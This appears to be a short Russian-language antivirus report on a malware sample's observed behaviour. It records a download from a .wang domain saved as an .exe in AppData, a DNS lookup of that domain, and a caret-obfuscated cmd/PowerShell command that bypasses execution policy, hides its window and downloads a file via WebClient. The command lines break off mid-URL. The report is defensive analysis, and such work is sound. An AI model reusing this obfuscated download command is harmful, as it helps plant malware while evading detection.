Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWeR^Shel^L^.EXE -E^XEcuTIon^p^olI^cy byPasS ^-n^oproFilE^ -^wi^n^DOwst^yLE H^idDE^N (NEw-ob^j^E^C^T ^S^ySte^M.^nEt.^WEBCl^IEn^T).DO^wn^lOa^d^Fil^E^(^'http://transporingsytw.w...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "POWeR^Shel^L^.EXE -E^XEcuTIon^p^olI^cy byPasS ^-n^oproFilE^ -^wi^n^DOwst^yLE H^idDE^N (NEw-ob^j^E^C^T ^S^ySte^M.^nEt.^WEBCl^IEn^T).DO^wn^lOa^d^Fil^E^(^'http://transporingsytw.w...' (со скрытым окном)